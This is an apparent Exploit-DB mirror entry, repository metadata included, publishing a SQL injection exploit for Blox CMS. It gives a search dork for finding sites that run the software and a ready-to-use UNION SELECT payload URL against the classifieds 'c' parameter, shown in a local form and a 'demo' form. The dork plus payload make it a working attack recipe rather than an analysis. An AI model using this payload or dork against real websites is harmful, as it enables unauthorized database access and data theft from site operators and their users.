exploit-db-mirror/exploits/php/webapps/12729.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

24 lines
No EOL
778 B
Text

-------------------------------------------------------------------------------------------
Blox CMS SQL Injection Vulnerability
-------------------------------------------------------------------------------------------
Author: CoBRa_21
Script Home: http://bloxcms.com/
Dork: Powered by Blox CMS from TownNews.com
-------------------------------------------------------------------------------------------
Sql Injection:
http://localhost/[path]/app/classifieds/rentals/?c=-156%20union%20select%200,1,2,3,4,version%28%29,6,7,8,9,10,11,12,13,14,15
Demo :
http://www.site.com/app/classifieds/rentals/?c=-156%20union%20select%200,1,2,3,4,version%28%29,6,7,8,9,10,11,12,13,14,15
-------------------------------------------------------------------------------------------